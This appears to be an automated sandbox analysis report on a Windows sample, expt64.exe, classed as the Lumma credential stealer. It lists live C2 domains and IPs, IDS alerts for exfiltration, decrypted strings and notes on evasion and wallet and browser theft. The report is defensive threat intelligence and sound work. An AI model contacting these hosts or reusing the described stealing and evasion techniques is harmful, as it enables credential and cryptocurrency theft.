Edit tour

Windows Analysis Report
expt64.exe

Overview

General Information

Sample name:	expt64.exe
Analysis ID:	1587438
MD5:	c4cb62a984955f3ad185c1b289d816d9
SHA1:	afaa3f895bc307c7dc41f9641a5c757a82e0c5fb
SHA256:	a42ce4178e7dc0be9b8f8b91ef4af38e05c66c587b7ae80840cc60f45051d773
Tags:	AdwareGenericexeuser-zhuzhu0009
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Detected potential unwanted application

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

expt64.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\expt64.exe" MD5: C4CB62A984955F3AD185C1B289D816D9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["shapestickyr.lat", "slipperyloo.lat", "wordyfindy.lat", "manyrestro.lat", "talkynicer.lat", "curverpluch.lat", "bashfulacid.lat", "tentabatte.lat", "brendon-sharjen.biz"], "Build id": "HpOoIh--3fe7f419a360"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4d8b8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x50e4e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: expt64.exe PID: 6988	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: expt64.exe PID: 6988	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: expt64.exe PID: 6988	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:20.299112+0100	2028371	3	Unknown Traffic	192.168.2.12	49715	104.102.49.254	443	TCP
2025-01-10T11:36:21.414391+0100	2028371	3	Unknown Traffic	192.168.2.12	49716	104.21.64.1	443	TCP
2025-01-10T11:36:22.439288+0100	2028371	3	Unknown Traffic	192.168.2.12	49717	104.21.64.1	443	TCP
2025-01-10T11:36:23.858172+0100	2028371	3	Unknown Traffic	192.168.2.12	49719	104.21.64.1	443	TCP
2025-01-10T11:36:25.272889+0100	2028371	3	Unknown Traffic	192.168.2.12	49722	104.21.64.1	443	TCP
2025-01-10T11:36:26.645648+0100	2028371	3	Unknown Traffic	192.168.2.12	49724	104.21.64.1	443	TCP
2025-01-10T11:36:28.057227+0100	2028371	3	Unknown Traffic	192.168.2.12	49725	104.21.64.1	443	TCP
2025-01-10T11:36:29.027636+0100	2028371	3	Unknown Traffic	192.168.2.12	49727	104.21.64.1	443	TCP
2025-01-10T11:36:30.372212+0100	2028371	3	Unknown Traffic	192.168.2.12	49728	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:21.874704+0100	2054653	1	A Network Trojan was detected	192.168.2.12	49716	104.21.64.1	443	TCP
2025-01-10T11:36:22.914361+0100	2054653	1	A Network Trojan was detected	192.168.2.12	49717	104.21.64.1	443	TCP
2025-01-10T11:36:30.829987+0100	2054653	1	A Network Trojan was detected	192.168.2.12	49728	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:21.874704+0100	2049836	1	A Network Trojan was detected	192.168.2.12	49716	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:22.914361+0100	2049812	1	A Network Trojan was detected	192.168.2.12	49717	104.21.64.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:19.624899+0100	2058480	1	Domain Observed Used for C2 Detected	192.168.2.12	50747	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:19.519203+0100	2058039	1	Domain Observed Used for C2 Detected	192.168.2.12	56350	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:19.596381+0100	2058484	1	Domain Observed Used for C2 Detected	192.168.2.12	49419	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:19.558399+0100	2058492	1	Domain Observed Used for C2 Detected	192.168.2.12	54281	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:19.573166+0100	2058500	1	Domain Observed Used for C2 Detected	192.168.2.12	53122	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:19.543790+0100	2058502	1	Domain Observed Used for C2 Detected	192.168.2.12	56265	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:19.584352+0100	2058510	1	Domain Observed Used for C2 Detected	192.168.2.12	56378	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:19.610905+0100	2058512	1	Domain Observed Used for C2 Detected	192.168.2.12	52479	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:19.532991+0100	2058514	1	Domain Observed Used for C2 Detected	192.168.2.12	64590	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:28.492586+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.12	49725	104.21.64.1	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:36:20.782904+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.12	49715	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://wordyfindy.lat/apiM:	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/t	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apijOg	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apiing	Avira URL Cloud: Label: malware
Source: brendon-sharjen.biz	Avira URL Cloud: Label: malware

Found malware configuration

Source: expt64.exe.6988.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["shapestickyr.lat", "slipperyloo.lat", "wordyfindy.lat", "manyrestro.lat", "talkynicer.lat", "curverpluch.lat", "bashfulacid.lat", "tentabatte.lat", "brendon-sharjen.biz"], "Build id": "HpOoIh--3fe7f419a360"}

Multi AV Scanner detection for submitted file

Source: expt64.exe	ReversingLabs: Detection: 65%
Source: expt64.exe	Virustotal: Detection: 72%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.5% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: brendon-sharjen.biz
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: HpOoIh--3fe7f419a360

Source: expt64.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.12:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49728 version: TLS 1.2

Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0231D26D
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	0_2_0231A2A5
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx edx, word ptr [esp+esi*2]	0_2_02330287
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx edx, word ptr [esp+esi*2]	0_2_02330263
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx ebx, word ptr [esi]	0_2_022FC2DC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 7F7BECC6h	0_2_0232D2CC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2+12h]	0_2_022FE36E
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_0230B35C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	0_2_0230B35C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx edi, word ptr [esp+eax*2+10h]	0_2_0230B35C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx ecx, word ptr [esp+eax*2+28h]	0_2_023183BC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_0232F3ED
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then add eax, 10h	0_2_0230B029
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+0000028Ch]	0_2_0231F012
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h	0_2_0233207C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+06h]	0_2_0231A056
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2+14h]	0_2_0232A0EC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_0230D155
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h	0_2_023311AC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [esi+ecx*8], E0A81160h	0_2_0230819C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx ebp, word ptr [esp+ecx*2-7B41DE5Ah]	0_2_0231719C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2-00002C30h]	0_2_022FE6A1
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then push eax	0_2_0232F68A
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov dword ptr [edi], 60296828h	0_2_02316730
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx edi, word ptr [ecx]	0_2_0230D7BB
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0231D7A3
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	0_2_023307CB
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx esi, word ptr [ebx+eax*2]	0_2_023167CF
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]	0_2_0231B461
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0231244C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then lea edi, dword ptr [edx+00001E1Eh]	0_2_022FF4B7
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	0_2_023304EF
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah	0_2_0233153C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 56ADC53Ah	0_2_0233153C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	0_2_023305EC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then add ecx, edi	0_2_0231CA3B
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0231AA7A
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h	0_2_02330A6C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx ebx, word ptr [esp+edx*2+28h]	0_2_02309A4D
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then lea eax, dword ptr [esi+00003763h]	0_2_022FDAB7
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 17265850h	0_2_02331AEC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then lea ecx, dword ptr [eax+00000960h]	0_2_0230DB3E
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2]	0_2_0232EB05
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h	0_2_02330B7C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_02313B6C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	0_2_02316B6C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then lea edx, dword ptr [eax-00001099h]	0_2_0232CBFC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_0231ABDD
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+40h]	0_2_0232E81C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_022FA87C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0231D867
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0231D8B2
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	0_2_023078B8
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0231388C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_0232688C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0231D8C9
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	0_2_0233192C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h	0_2_02307978
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_023179BA
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_023179BC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0231B9AC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_0230AE33
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_022F8E3C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_022F8E3C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh	0_2_02331E2C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx esi, word ptr [esp+eax*2+04h]	0_2_0232CE7C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2DFE5A91h	0_2_02330E7C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov dword ptr [esp+04h], ebx	0_2_0231CEB8
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h	0_2_02331EFC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then mov byte ptr [esi+ecx], dl	0_2_022FBF13
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then jmp edi	0_2_022FBF5F
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then lea ecx, dword ptr [eax+000071B9h]	0_2_02317F4C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then lea ecx, dword ptr [eax-000037DBh]	0_2_022FAF9C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax*2+4D3B4CBCh]	0_2_022FBCD2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz) : 192.168.2.12:56350 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.12:56265 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.12:50747 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.12:49419 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.12:64590 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.12:56378 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.12:53122 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.12:52479 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.12:54281 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.12:49715 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.12:49716 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49716 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.12:49725 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49728 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.12:49717 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49717 -> 104.21.64.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: brendon-sharjen.biz

Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49716 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49724 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49725 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49719 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49728 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49727 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49717 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49715 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49722 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
